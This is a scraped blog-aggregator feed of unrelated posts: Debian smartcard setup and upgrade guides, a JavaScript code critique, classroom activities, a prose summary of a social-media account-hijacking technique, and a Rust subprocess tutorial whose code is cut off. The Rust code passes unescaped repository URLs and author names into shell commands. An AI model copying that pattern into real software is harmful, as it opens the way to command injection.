Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianHideki Yamane: PoC: use Sphinx for debian-policy

Before the party, we had a monthly study meeting where I gave a talk about a tiny hack for the debian-policy document.

debian-policy was converted from debian-sgml to docbook in 4.0.0, and my proposal is "Go move forward to Sphinx".

Here's sample, and you can also get PoC source from my GitHub repo and check it.

CryptogramNew Technique to Hijack Social Media Accounts

Access Now has documented it being used against a Twitter user, but it also works against other social media accounts:

With the Doubleswitch attack, a hijacker takes control of a victim's account through one of several attack vectors. People who have not enabled an app-based form of multifactor authentication for their accounts are especially vulnerable. For instance, an attacker could trick you into revealing your password through phishing. If you don't have multifactor authentication, you lack a secondary line of defense. Once in control, the hijacker can then send messages and also subtly change your account information, including your username. The original username for your account is now available, allowing the hijacker to register for an account using that original username, while providing different login credentials.

Three news stories.

Worse Than FailureRepresentative Line: Highly Functional

For a brief period of time, say, about 3–4 years ago, if you wanted to sound really smart, you’d bring up “functional programming”. Name-dropping LISP or even better, Haskell during an interview marked you as a cut above the hoi polloi. Even I, surly and too smart for this, fell into the trap of calling JavaScript “LISP with curly braces”, just because it had closures.

Still, functional programming features have percolated through other languages because they work. They’re another tool for the job, and like any tool, when used by the inexpert, someone might lose a finger. Or perhaps someone should lose a finger, if only as a warning to others.

For example, what if you wanted to execute a loop 100 times in JavaScript? You could use a crummy old for loop, but that’s not functional. The functional solution comes from an anonymous submitter:

Array.apply(null, {length: 99}).map(Number.call, Number).forEach(function (element, index) {
// do some more crazy stuff
});

This is actually an amazing abuse of JavaScript’s faculties, and I thought I saw the worst depredations one could visit on JavaScript while working with Angular code. When I first read this line, my initial reaction was, “oh, that’s not so bad.” Then I tried to trace through its logic. Then I realized, no, this is actually really bad. Not just extraneous arrays bad, but full abuse of JavaScript bad. Like call Language Protective Services bad. This is easier to explain if you look at it backwards.

forEach applies a function to each element in the array, supplying the element and the index of that element.

Number.call invokes the Number function, used to convert things into numbers (shocking, I know), but it allows you to supply the this against which the function is executed. map takes a callback function and supplies an array item for the currentValue, the index, and the whole array as parameters. map also allows you to specify what this is for the callback itself, which they set to be Number, the function they’re calling.

So, remember, map expects a callback in the form f(currentValue, index, array). We’re supplying a function: call(thisValue, numberToConvert). So, the end result of map in this function is that we’re going to emit an array with each element equal to its own index, which makes the forEach look a bit silly.

Finally, at the front, we call Array.apply, which is mostly the same as Array.call, with a difference in how arguments get passed. This allows the developer to deftly avoid writing new Array(99), which would have the same result, but would look offensively object-oriented.
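For contrast, a sketch (mine, not the submitter’s) of how to get the same 99 iterations without any of the gymnastics:

```javascript
// The plain, boring version of the loop.
for (let i = 0; i < 99; i++) {
  // do some more crazy stuff
}

// If a functional flavor is wanted, Array.from builds the same
// [0, 1, ..., 98] index array directly, no call/apply contortions:
Array.from({ length: 99 }, (_, i) => i).forEach(function (element, index) {
  // element === index here, exactly as in the original one-liner
});
```

Array.from accepts any array-like with a length property plus a mapping function, which is precisely the behavior the original line reconstructs by abusing apply, map, and call.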

[Advertisement] High availability, Load-balanced or Basic – design your own Universal Package Manager, allow the enterprise to scale as you grow. Download and see for yourself!

Planet DebianMichal Čihař: Call for Weblate translations

Weblate 2.15 is almost ready (I expect no further code changes), so it's a really great time to contribute to its translations! Weblate 2.15 should be released early next week.

As you might expect, Weblate is translated using Weblate, so the contributions should be really easy. In case there is something unclear, you can look into Weblate documentation.

I'd especially like to see improvements in the Italian translation which was one of the first in Weblate beginnings, but hasn't received much love in past years.

Filed under: Debian English SUSE Weblate

,

Planet Linux AustraliaOpenSTEM: HASS Additional Activities

OK, so you’ve got the core work covered for the term and now you have all those reports to write and admin to catch up on. Well, the OpenSTEM™ Understanding Our World® HASS plus Science material has heaps of activities which help students to practise core curricular skills and can keep students occupied. Here are some ideas:

 Aunt Madge’s Suitcase Activity

Aunt Madge

Aunt Madge is a perennial favourite with students of all ages. In this activity, students use clues to follow Aunt Madge around the world trying to return her forgotten suitcase. There’s a wide range of locations to choose from on every continent – both natural and constructed places. This activity can be tailored for group work, or the whole class, and by adjusting the number of locations to be found, the teacher can adjust to the available time, anywhere from 10-15 minutes to a whole lesson. Younger students enjoy matching the pictures of locations and trying to find the countries on the map. Older students can find out further information about the locations on the information sheets. Teachers can even choose a theme for the locations (such as “Ancient History” or “Aboriginal Places”) and see if students can guess what it is.

 Ancient Sailing Ships Activity

Sailing Ships (History + Science)

Students in Years 3 to 6 have undertaken the Ancient Sailing Ships activity this term, however, there is a vast scope for additional aspects to this activity. Have students compared the performance of square-rigged versus lateen sails? How about varying the number of masts? Have students raced the vessels against each other? (a water trough and a fan are all that's needed for some exciting races) Teachers can encourage the students to examine the effects of other changes to ship design, such as adding a keel or any other innovations students can come up with, which can be tested. Perhaps classes or grades can even race their ships against each other.

Trade and Barter Activity

Students in years 5 and 6 in particular enjoy the Trade and Barter activity, which teaches them the basics of Economics without them even realising it! This activity covers so many different aspects of the curriculum, that it is always a good one to revisit, even though it was not in this term’s units. Students enjoy the challenge and will find the activity different each time. It is a particularly good choice for a large chunk of time, or for smaller groups; perhaps a more experienced group can coach other students. The section of the activity which has students developing their own system of writing is one that lends itself to extension and can even be spun off as a separate activity.

Games from the Past

Kids Playing Tag

Students of all ages enjoy many of the games listed in the resource Games From The Past. Several of these games are best done whilst running around outside, so if that is an option, then choose from the Aboriginal, Chinese or Zulu games. Many of these games can be played by large groups. Older students might like to try recreating some of the rules for some of the games of Ancient Egypt or the Aztecs. If this resource wasn’t part of the resources for your particular unit, it can be downloaded from the OpenSTEM™ site directly.

 

Class Discussions

The b) and c) sections of the Teacher Handbooks contain suggestions for topics of discussion – such as Women Explorers or global citizenship, or ideas for drawings that the students can do. These can also be undertaken as additional activities. Teachers could divide students into groups to research and explore particular aspects of these topics, or stage debates, allowing students to practise persuasive writing skills as well.

OpenSTEM A0 world map: Country Outlines and Ice Age Coastline

Adding events to a timeline, or to the class calendar, is also a good way to practise core skills.

The OpenSTEM™ Our World map is used as the perfect complement to many of the Understanding Our World® units. This map comes blank and country names are added to the map during activities. The end of term is also a good chance for students to continue adding country names to the map. These can be cut out of the resource World Countries, which supplies the names in a suitable font size. Students can use the resource World Maps to match the country names to their locations.

We hope you find these suggestions useful!

Enjoy the winter holidays – not too long now to a nice, cosy break!

Planet DebianSimon Josefsson: OpenPGP smartcard under GNOME on Debian 9.0 Stretch

I installed Debian 9.0 “Stretch” on my Lenovo X201 laptop today. Installation went smooth, as usual. GnuPG/SSH with an OpenPGP smartcard — I use a YubiKey NEO — does not work out of the box with GNOME though. I wrote about how to fix OpenPGP smartcards under GNOME with Debian 8.0 “Jessie” earlier, and I thought I’d do a similar blog post for Debian 9.0 “Stretch”. The situation is slightly different than before (e.g., GnuPG works better but SSH doesn’t) so there is some progress. May I hope that Debian 10.0 “Buster” gets this right? Pointers to which package in Debian should have a bug report tracking this issue are welcome (or a pointer to an existing bug report).

After first login, I attempt to use gpg --card-status to check if GnuPG can talk to the smartcard.

jas@latte:~$ gpg --card-status
gpg: error getting version from 'scdaemon': No SmartCard daemon
gpg: OpenPGP card not available: No SmartCard daemon
jas@latte:~$ 

This fails because scdaemon is not installed. Isn’t a smartcard common enough so that this should be installed by default on a GNOME Desktop Debian installation? Anyway, install it as follows.

root@latte:~# apt-get install scdaemon

Then try again.

jas@latte:~$ gpg --card-status
gpg: selecting openpgp failed: No such device
gpg: OpenPGP card not available: No such device
jas@latte:~$ 

I believe scdaemon here attempts to use its internal CCID implementation, and I do not know why it does not work. At this point I usually recall that I want pcscd installed since I work with smartcards in general.

root@latte:~# apt-get install pcscd

Now gpg --card-status works!

jas@latte:~$ gpg --card-status

Reader ...........: Yubico Yubikey NEO CCID 00 00
Application ID ...: D2760001240102000006017403230000
Version ..........: 2.0
Manufacturer .....: Yubico
Serial number ....: 01740323
Name of cardholder: Simon Josefsson
Language prefs ...: sv
Sex ..............: male
URL of public key : https://josefsson.org/54265e8c.txt
Login data .......: jas
Signature PIN ....: not forced
Key attributes ...: rsa2048 rsa2048 rsa2048
Max. PIN lengths .: 127 127 127
PIN retry counter : 3 3 3
Signature counter : 8358
Signature key ....: 9941 5CE1 905D 0E55 A9F8  8026 860B 7FBB 32F8 119D
      created ....: 2014-06-22 19:19:04
Encryption key....: DC9F 9B7D 8831 692A A852  D95B 9535 162A 78EC D86B
      created ....: 2014-06-22 19:19:20
Authentication key: 2E08 856F 4B22 2148 A40A  3E45 AF66 08D7 36BA 8F9B
      created ....: 2014-06-22 19:19:41
General key info..: sub  rsa2048/860B7FBB32F8119D 2014-06-22 Simon Josefsson 
sec#  rsa3744/0664A76954265E8C  created: 2014-06-22  expires: 2017-09-04
ssb>  rsa2048/860B7FBB32F8119D  created: 2014-06-22  expires: 2017-09-04
                                card-no: 0006 01740323
ssb>  rsa2048/9535162A78ECD86B  created: 2014-06-22  expires: 2017-09-04
                                card-no: 0006 01740323
ssb>  rsa2048/AF6608D736BA8F9B  created: 2014-06-22  expires: 2017-09-04
                                card-no: 0006 01740323
jas@latte:~$ 

Using the key will not work though.

jas@latte:~$ echo foo|gpg -a --sign
gpg: no default secret key: No secret key
gpg: signing failed: No secret key
jas@latte:~$ 

This is because the public key and the secret key stub are not available.

jas@latte:~$ gpg --list-keys
jas@latte:~$ gpg --list-secret-keys
jas@latte:~$ 

You need to import the key for this to work. I have some vague memory that gpg --card-status was supposed to do this, but I may be wrong.

jas@latte:~$ gpg --recv-keys 9AA9BDB11BB1B99A21285A330664A76954265E8C
gpg: failed to start the dirmngr '/usr/bin/dirmngr': No such file or directory
gpg: connecting dirmngr at '/run/user/1000/gnupg/S.dirmngr' failed: No such file or directory
gpg: keyserver receive failed: No dirmngr
jas@latte:~$ 

Surprisingly, dirmngr is also not shipped by default so it has to be installed manually.

root@latte:~# apt-get install dirmngr

Below I proceed to trust the clouds to find my key.

jas@latte:~$ gpg --recv-keys 9AA9BDB11BB1B99A21285A330664A76954265E8C
gpg: key 0664A76954265E8C: public key "Simon Josefsson " imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg:               imported: 1
jas@latte:~$ 

Now the public key and the secret key stub are available locally.

jas@latte:~$ gpg --list-keys
/home/jas/.gnupg/pubring.kbx
----------------------------
pub   rsa3744 2014-06-22 [SC] [expires: 2017-09-04]
      9AA9BDB11BB1B99A21285A330664A76954265E8C
uid           [ unknown] Simon Josefsson 
uid           [ unknown] Simon Josefsson 
sub   rsa2048 2014-06-22 [S] [expires: 2017-09-04]
sub   rsa2048 2014-06-22 [E] [expires: 2017-09-04]
sub   rsa2048 2014-06-22 [A] [expires: 2017-09-04]

jas@latte:~$ gpg --list-secret-keys
/home/jas/.gnupg/pubring.kbx
----------------------------
sec#  rsa3744 2014-06-22 [SC] [expires: 2017-09-04]
      9AA9BDB11BB1B99A21285A330664A76954265E8C
uid           [ unknown] Simon Josefsson 
uid           [ unknown] Simon Josefsson 
ssb>  rsa2048 2014-06-22 [S] [expires: 2017-09-04]
ssb>  rsa2048 2014-06-22 [E] [expires: 2017-09-04]
ssb>  rsa2048 2014-06-22 [A] [expires: 2017-09-04]

jas@latte:~$ 

I am now able to sign data with the smartcard, yay!

jas@latte:~$ echo foo|gpg -a --sign
-----BEGIN PGP MESSAGE-----

owGbwMvMwMHYxl2/2+iH4FzG01xJDJFu3+XT8vO5OhmNWRgYORhkxRRZZjrGPJwQ
yxe68keDGkwxKxNIJQMXpwBMRJGd/a98NMPJQt6jaoyO9yUVlmS7s7qm+Kjwr53G
uq9wQ+z+/kOdk9w4Q39+SMvc+mEV72kuH9WaW9bVqj80jN77hUbfTn5mffu2/aVL
h/IneTfaOQaukHij/P8A0//Phg/maWbONUjjySrl+a3tP8ll6/oeCd8g/aeTlH79
i0naanjW4bjv9wnvGuN+LPHLmhUc2zvZdyK3xttN/roHvsdX3f53yTAxeInvXZmd
x7W0/hVPX33Y4nT877T/ak4L057IBSavaPVcf4yhglVI8XuGgaTP666Wuslbliy4
5W5eLasbd33Xd/W0hTINznuz0kJ4r1bLHZW9fvjLduMPq5rS2co9tvW8nX9rhZ/D
zycu/QA=
=I8rt
-----END PGP MESSAGE-----
jas@latte:~$ 

Encrypting to myself will not work smoothly though.

jas@latte:~$ echo foo|gpg -a --encrypt -r simon@josefsson.org
gpg: 9535162A78ECD86B: There is no assurance this key belongs to the named user
sub  rsa2048/9535162A78ECD86B 2014-06-22 Simon Josefsson 
 Primary key fingerprint: 9AA9 BDB1 1BB1 B99A 2128  5A33 0664 A769 5426 5E8C
      Subkey fingerprint: DC9F 9B7D 8831 692A A852  D95B 9535 162A 78EC D86B

It is NOT certain that the key belongs to the person named
in the user ID.  If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) 
gpg: signal Interrupt caught ... exiting

jas@latte:~$ 

The reason is that the newly imported key has unknown trust settings. I update the trust settings on my key to fix this, and encrypting now works without a prompt.

jas@latte:~$ gpg --edit-key 9AA9BDB11BB1B99A21285A330664A76954265E8C
gpg (GnuPG) 2.1.18; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

pub  rsa3744/0664A76954265E8C
     created: 2014-06-22  expires: 2017-09-04  usage: SC  
     trust: unknown       validity: unknown
ssb  rsa2048/860B7FBB32F8119D
     created: 2014-06-22  expires: 2017-09-04  usage: S   
     card-no: 0006 01740323
ssb  rsa2048/9535162A78ECD86B
     created: 2014-06-22  expires: 2017-09-04  usage: E   
     card-no: 0006 01740323
ssb  rsa2048/AF6608D736BA8F9B
     created: 2014-06-22  expires: 2017-09-04  usage: A   
     card-no: 0006 01740323
[ unknown] (1). Simon Josefsson 
[ unknown] (2)  Simon Josefsson 

gpg> trust
pub  rsa3744/0664A76954265E8C
     created: 2014-06-22  expires: 2017-09-04  usage: SC  
     trust: unknown       validity: unknown
ssb  rsa2048/860B7FBB32F8119D
     created: 2014-06-22  expires: 2017-09-04  usage: S   
     card-no: 0006 01740323
ssb  rsa2048/9535162A78ECD86B
     created: 2014-06-22  expires: 2017-09-04  usage: E   
     card-no: 0006 01740323
ssb  rsa2048/AF6608D736BA8F9B
     created: 2014-06-22  expires: 2017-09-04  usage: A   
     card-no: 0006 01740323
[ unknown] (1). Simon Josefsson 
[ unknown] (2)  Simon Josefsson 

Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)

  1 = I don't know or won't say
  2 = I do NOT trust
  3 = I trust marginally
  4 = I trust fully
  5 = I trust ultimately
  m = back to the main menu

Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y

pub  rsa3744/0664A76954265E8C
     created: 2014-06-22  expires: 2017-09-04  usage: SC  
     trust: ultimate      validity: unknown
ssb  rsa2048/860B7FBB32F8119D
     created: 2014-06-22  expires: 2017-09-04  usage: S   
     card-no: 0006 01740323
ssb  rsa2048/9535162A78ECD86B
     created: 2014-06-22  expires: 2017-09-04  usage: E   
     card-no: 0006 01740323
ssb  rsa2048/AF6608D736BA8F9B
     created: 2014-06-22  expires: 2017-09-04  usage: A   
     card-no: 0006 01740323
[ unknown] (1). Simon Josefsson 
[ unknown] (2)  Simon Josefsson 
Please note that the shown key validity is not necessarily correct
unless you restart the program.

gpg> quit
jas@latte:~$ echo foo|gpg -a --encrypt -r simon@josefsson.org
-----BEGIN PGP MESSAGE-----

hQEMA5U1Fip47NhrAQgArTvAykj/YRhWVuXb6nzeEigtlvKFSmGHmbNkJgF5+r1/
/hWENR72wsb1L0ROaLIjM3iIwNmyBURMiG+xV8ZE03VNbJdORW+S0fO6Ck4FaIj8
iL2/CXyp1obq1xCeYjdPf2nrz/P2Evu69s1K2/0i9y2KOK+0+u9fEGdAge8Gup6y
PWFDFkNj2YiVa383BqJ+kV51tfquw+T4y5MfVWBoHlhm46GgwjIxXiI+uBa655IM
EgwrONcZTbAWSV4/ShhR9ug9AzGIJgpu9x8k2i+yKcBsgAh/+d8v7joUaPRZlGIr
kim217hpA3/VLIFxTTkkm/BO1KWBlblxvVaL3RZDDNI5AVp0SASswqBqT3W5ew+K
nKdQ6UTMhEFe8xddsLjkI9+AzHfiuDCDxnxNgI1haI6obp9eeouGXUKG
=s6kt
-----END PGP MESSAGE-----
jas@latte:~$ 

So everything is fine, isn’t it? Alas, not quite.

jas@latte:~$ ssh-add -L
The agent has no identities.
jas@latte:~$ 

Tracking this down, I now realize that GNOME’s keyring is used for SSH but GnuPG’s gpg-agent is used for GnuPG. GnuPG uses the environment variable GPG_AGENT_INFO to connect to an agent, and SSH uses the SSH_AUTH_SOCK environment variable to find its agent. The filenames used below leak the knowledge that gpg-agent is used for GnuPG but GNOME keyring is used for SSH.

jas@latte:~$ echo $GPG_AGENT_INFO 
/run/user/1000/gnupg/S.gpg-agent:0:1
jas@latte:~$ echo $SSH_AUTH_SOCK 
/run/user/1000/keyring/ssh
jas@latte:~$ 

Here the same recipe as in my previous blog post works. This time GNOME keyring only has to be disabled for SSH. Disabling GNOME keyring is not sufficient; you also need gpg-agent to start with enable-ssh-support. The simplest way to achieve that is to add a line in ~/.gnupg/gpg-agent.conf as follows. When you login, the script /etc/X11/Xsession.d/90gpg-agent will set the environment variables GPG_AGENT_INFO and SSH_AUTH_SOCK. The latter variable is only set if enable-ssh-support is mentioned in the gpg-agent configuration.

jas@latte:~$ mkdir ~/.config/autostart
jas@latte:~$ cp /etc/xdg/autostart/gnome-keyring-ssh.desktop ~/.config/autostart/
jas@latte:~$ echo 'Hidden=true' >> ~/.config/autostart/gnome-keyring-ssh.desktop 
jas@latte:~$ echo enable-ssh-support >> ~/.gnupg/gpg-agent.conf 
jas@latte:~$ 

Log out from GNOME and log in again. Now you should see ssh-add -L working.

jas@latte:~$ ssh-add -L
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFP+UOTZJ+OXydpmbKmdGOVoJJz8se7lMs139T+TNLryk3EEWF+GqbB4VgzxzrGjwAMSjeQkAMb7Sbn+VpbJf1JDPFBHoYJQmg6CX4kFRaGZT6DHbYjgia59WkdkEYTtB7KPkbFWleo/RZT2u3f8eTedrP7dhSX0azN0lDuu/wBrwedzSV+AiPr10rQaCTp1V8sKbhz5ryOXHQW0Gcps6JraRzMW+ooKFX3lPq0pZa7qL9F6sE4sDFvtOdbRJoZS1b88aZrENGx8KSrcMzARq9UBn1plsEG4/3BRv/BgHHaF+d97by52R0VVyIXpLlkdp1Uk4D9cQptgaH4UAyI1vr cardno:000601740323
jas@latte:~$ 

Topics for further discussion or research include 1) whether scdaemon, dirmngr and/or pcscd should be pre-installed on Debian desktop systems; 2) whether gpg --card-status should attempt to import the public key and secret key stub automatically; 3) why GNOME keyring is used by default for SSH rather than gpg-agent; 4) whether GNOME keyring should support smartcards, or if it is better to always use gpg-agent for GnuPG/SSH, 5) if something could/should be done to automatically infer the trust setting for a secret key.
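On item 5, one non-interactive alternative to the trust menu walked through earlier is gpg's ownertrust import format. A minimal sketch (the actual gpg invocation is left as a comment, since it modifies the local trust database):

```shell
# Build an ownertrust record for the key imported earlier.
# The format is "<fingerprint>:<level>:", where level 6 means ultimate trust.
FPR=9AA9BDB11BB1B99A21285A330664A76954265E8C
printf '%s:6:\n' "$FPR"
# To apply it without the interactive menu, pipe the record into gpg:
#   printf '%s:6:\n' "$FPR" | gpg --import-ownertrust
```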

Enjoy!

Planet DebianAlexander Wirt: alioth needs your help

It may look as if the decision for pagure as the alioth replacement is already final, but that’s not really true. I got a lot of feedback and tips in the last weeks, and those made me postpone my decision. Several alternative systems were recommended to me; here are a few examples:

and probably several others. I won’t be able to evaluate all of those systems in advance of our sprint. That’s where you come in: if you are familiar with one of those systems, or want to get familiar with them, join us on our mailing list and create a wiki page below https://wiki.debian.org/Alioth/GitNext with a review of your system.

What do we need to know?

  • Feature set compared to current alioth
  • Feature set compared to a popular system like github
  • Some implementation designs
  • Some information about scaling (expect something like 15,000 to 25,000 repos)
  • Support for other version control systems
  • Advantages: why should we choose that system
  • Disadvantages: why shouldn’t we choose that system
  • License
  • Other interesting features
  • Details about extensibility
  • A really nice thing would be a working vagrant box / vagrantfile + ansible/puppet to test things

If you want to start on such a review, please announce it on the mailing list.

If you have questions, ask me on IRC, Twitter or mail. Thanks for your help!

Rondam RamblingsTrumpcare and the TPP: Republicans have learned nothing from history

As long as I'm ranting about Republican hypocrisy, I feel I should say a word about the secretive and thoroughly undemocratic process being employed by them to pass the Trumpcare bill.  If history is any guide, this will come back to bite them badly.  But Republicans don't seem to learn from history.  (Neither do Democrats, actually, but they aren't the ones trying to take my health insurance

Planet DebianEriberto Mota: How to migrate from Debian Jessie to Stretch

Welcome to Debian Stretch!

Yesterday, 17 June 2017, Debian 9 (Stretch) was released. I would like to cover some basic procedures and rules for migrating from Debian 8 (Jessie).

Initial steps

  • The first thing to do is read the release notes. This is essential to learn about possible bugs and special situations.
  • The second step is to fully update Jessie before migrating to Stretch. To do so, still within Debian 8, run the following commands:
# apt-get update
# apt-get dist-upgrade

Migrating

  • Edit the file /etc/apt/sources.list and change every occurrence of jessie to stretch. Below is an example of the contents of this file (it may vary according to your needs):
deb http://ftp.br.debian.org/debian/ stretch main
deb-src http://ftp.br.debian.org/debian/ stretch main
                                                                                                                                
deb http://security.debian.org/ stretch/updates main
deb-src http://security.debian.org/ stretch/updates main
  • Then, run:
# apt-get update
# apt-get dist-upgrade

If any problem occurs, read the error messages and try to resolve it. Whether or not you manage to resolve the problem, run the command again:

# apt-get dist-upgrade

If new problems appear, try to resolve them. Search for solutions on Google if necessary. But usually everything will go fine and you should not have problems.
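The jessie-to-stretch rename in sources.list can also be done with a single sed substitution. A sketch, demonstrated here on one sample line (in practice, run the same substitution on /etc/apt/sources.list as root, after making a backup):

```shell
# Show the effect of the substitution on a sample sources.list line:
echo 'deb http://ftp.br.debian.org/debian/ jessie main' \
  | sed 's/jessie/stretch/g'
# prints: deb http://ftp.br.debian.org/debian/ stretch main

# For the real file (as root, after backing it up):
#   sed -i 's/jessie/stretch/g' /etc/apt/sources.list
```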

Changes to configuration files

While you are migrating, some messages about changes to configuration files may be shown. This can leave some users lost, not knowing what to do. Don't panic.

These messages can be presented in two ways: as plain text in the shell, or as a blue message window. The following text is an example of a shell message:

Configuration file '/etc/rsyslog.conf'
 ==> Modified (by you or by a script) since installation.
 ==> Package distributor has shipped an updated version.
 What would you like to do about it? Your options are:
 Y or I : install the package maintainer's version
 N or O : keep your currently-installed version
 D : show the differences between the versions
 Z : start a shell to examine the situation
 The default action is to keep your current version.
*** rsyslog.conf (Y/I/N/O/D/Z) [default=N] ?

The following screen is an example of a message window:

In both cases, it is recommended that you choose to install the new version of the configuration file. This is because the new configuration file will be fully adapted to the newly installed services and may have many new or different options. But don't worry: your settings will not be lost, as a backup of them will be kept. So, in the shell, choose option "Y", and in the window, choose "install the package maintainer's version". It is very important to note down the name of each modified file. In the case of the window above, it is the file /etc/samba/smb.conf. In the shell case, the file was /etc/rsyslog.conf.

After completing the migration, you will be able to see both the new configuration file and the original one. If the new file was installed after a choice made in the shell, the original file (the one you had before) will keep the same name with the extension .dpkg-old. If the choice was made in the window, the file will be kept with the extension .ucf-old. In both cases, you can review the changes made and adjust your new file according to your needs.

If you need help seeing the differences between the files, you can use the diff command to compare them. Always diff from the new file to the original one. It is as if you wanted to see what to change in the new file to make it identical to the original. Example:

# diff -Naur /etc/rsyslog.conf /etc/rsyslog.conf.dpkg-old

At first glance, the lines marked with "+" would have to be added to the new file to make it look like the old one, and the lines marked with "-" would have to be removed. But be careful: it is normal for some lines to differ, because the configuration file was written for a new version of the service or application it belongs to. So change only the lines that are really necessary and that you had changed in the previous file. See the example:

+daemon.*;mail.*;\
+ news.err;\
+ *.=debug;*.=info;\
+ *.=notice;*.=warn |/dev/xconsole
+*.* @sam

In my case, I had originally changed only the last line. So, in the new configuration file, I am only interested in adding that line. Well, if you were the one who made the previous configuration, you will know the right thing to do. Usually there won't be many differences between the files.

Another option for viewing the differences between files is the mcdiff command, provided by the mc package. Example:

# mcdiff /etc/rsyslog.conf /etc/rsyslog.conf.dpkg-old

Problems with graphical environments and applications

You may run into problems with graphical environments such as GNOME, KDE etc., or with applications such as Mozilla Firefox. In these cases, the problem is likely to be in those components' configuration files in the user's home directory. To check, create a new user on the Debian system and test with it. If everything works, back up the previous configuration (or rename it) and let the application create a new one. For example, for Mozilla Firefox, go to the user's home directory and, with Firefox closed, rename the .mozilla directory to .mozilla.bak, then start Firefox and test.

Feeling unsure?

If you feel very unsure, install a Debian 8 system, with a graphical environment and everything else, in a virtual machine and migrate it to Debian 9 to test and learn. I suggest VirtualBox as the virtualizer.

Have fun!

 

Rondam RamblingsAnd the Oscar for Most Extreme Hypocrisy by a Republican goes to...

Newt Gingrich!  For saying that "the president “technically” can’t even obstruct justice" after leading the charge to impeach Bill Clinton for obstructing justice.  Congratulations, Mr. Gingrich!  Being the most hypocritical Republican is quite an achievement in this day and age.

Planet DebianMichal Čihař: python-gammu for Windows

It has been a few months since I started providing Windows binaries for Gammu, but other parts of the family were still missing. Today, I'm adding python-gammu.

Unlike previous attempts, which used cross-compilation on Linux using Wine, this is also based on AppVeyor. I still don't have to touch Windows to do it, which is nice :-). This was introduced in python-gammu 2.9 and depends on Gammu 1.38.4.

What is good about this is that pip install python-gammu should now work with binary packages if you're using Python 3.5 or 3.6.

Maybe I'll find time to look at providing Wammu as well, but it's trickier there as Wammu doesn't support Python 3, while python-gammu for Windows can currently only be built for Python 3.5 and 3.6 (due to MSVC dependencies of older Python versions).

Filed under: Debian English Gammu python-gammu Wammu

Planet DebianVasudev Kamath: Rust - Shell like Process pipelines using subprocess crate

I had to extract copyright information from the git repository of a crate's upstream. The need arose as part of updating debcargo, a tool to create a Debian package source from a Rust crate.

The general idea behind taking copyright information from git is to extract the first and latest contribution year for every author/committer. This can be easily achieved using the following shell snippet:

for author in $(git log --format="%an" | sort -u); do
   author_email=$(git log --format="%an <%ae>" --author="$author" | head -n1)
   first=$(git \
   log --author="$author" --date=format:%Y --format="%ad" --reverse \
             | head -n1)
   latest=$(git log --author="$author" --date=format:%Y --format="%ad" \
             | head -n1)
   if [ $first -eq $latest ]; then
       echo "$first, $author_email"
   else
       echo "$first-$latest, $author_email"
   fi
done
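The first/latest comparison at the end of the loop is the core of the notice formatting; as a standalone sketch (year_range is a hypothetical helper name, not part of debcargo):

```shell
# Collapse a first/latest contribution year pair into the notice
# format used above: "2014" when equal, "2014-2017" otherwise.
year_range() {
    if [ "$1" -eq "$2" ]; then
        echo "$1"
    else
        echo "$1-$2"
    fi
}
year_range 2014 2014   # prints 2014
year_range 2014 2017   # prints 2014-2017
```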

Now the challenge was to execute these commands in Rust and get the required answer. The first step was to look at std::process, the standard library's support for executing shell commands.

My idea was to execute the first command to extract the authors into a Rust vector, and then run the 2 remaining commands in a loop to extract the years. (I do not need the additional author_email command in Rust, as I can easily get both values from the first command, which is used in the for loop of the shell snippet, and use them inside another loop.) So I set up the 3 commands outside the loop with input and output redirected; the following snippet should give you some idea of what I tried to do.

let authors_command = Command::new("/usr/bin/git")
             .arg("log")
             .arg("--format=%an <%ae>")
             .stdout(Stdio::piped())  // capture output instead of inheriting
             .spawn()?;
let output = authors_command.wait_with_output()?;
let authors: Vec<String> = String::from_utf8(output.stdout)?
             .split('\n')
             .map(String::from)
             .collect();
let head_n1 = Command::new("/usr/bin/head")
             .arg("-n1")
             .stdin(Stdio::piped())
             .stdout(Stdio::piped())
             .spawn()?;
for author in &authors {
             ...
}

And inside the loop I would create the 2 additional git commands, read their output via a pipe, and feed it to the head command. This is where I learned that it is not as straightforward as it looks :-). The std::process::Command type implements neither the Copy nor the Clone traits, which means a single use of a command gives up its ownership! Here I started fighting with the borrow checker. I needed to duplicate declarations to make sure the required commands were available at all times. Additionally, I needed to handle error output at every point, which created too many nested statements, complicating the program and reducing its readability.

When it all started getting out of control, I gave it a second thought and wondered if it would be better to write this down as a shell script, ship it along with debcargo, and call the script from the Rust program. This would satisfy my need, but I would have to ship an additional script along with debcargo, which I was not really happy about.

Then a search on crates.io revealed subprocess, a crate designed to be similar to the subprocess module from Python! Though the crate is not highly downloaded, it still looked promising; in particular, it implements the BitOr trait, which allows use of the | operator to chain commands. Additionally, it allows executing full shell commands without the extra argument chaining done in the snippet above. The end result is a much simplified, easy-to-read, and correct function which does what was needed. Below is the function I wrote to extract copyright information from the git repo.

fn copyright_fromgit(repo: &str) -> Result<Vec<String>> {
    let tempdir = TempDir::new_in(".", "debcargo")?;
    Exec::shell(OsStr::new(format!("git clone --bare {} {}",
                                repo,
                                tempdir.path().to_str().unwrap())
                              .as_str())).stdout(subprocess::NullFile)
                              .stderr(subprocess::NullFile)
                              .popen()?;

    let author_process = {
         Exec::shell(OsStr::new("git log --format=\"%an <%ae>\"")).cwd(tempdir.path()) |
         Exec::shell(OsStr::new("sort -u"))
     }.capture()?;
    let authors = author_process.stdout_str().trim().to_string();
    let authors: Vec<&str> = authors.split('\n').collect();
    let mut notices: Vec<String> = Vec::new();
    for author in &authors {
        let reverse_command = format!("git log --author=\"{}\" --format=%ad --date=format:%Y \
                                    --reverse",
                                   author);
        let command = format!("git log --author=\"{}\" --format=%ad --date=format:%Y",
                           author);
        let first = {
             Exec::shell(OsStr::new(&reverse_command)).cwd(tempdir.path()) |
             Exec::shell(OsStr::new("head -n1"))
         }.capture()?;

         let latest = {
             Exec::shell(OsStr::new(&command)).cwd(tempdir.path()) | Exec::shell("head -n1")
         }.capture()?;

        let start = i32::from_str(first.stdout_str().trim())?;
        let end = i32::from_str(latest.stdout_str().trim())?;
        let cnotice = match start.cmp(&end) {
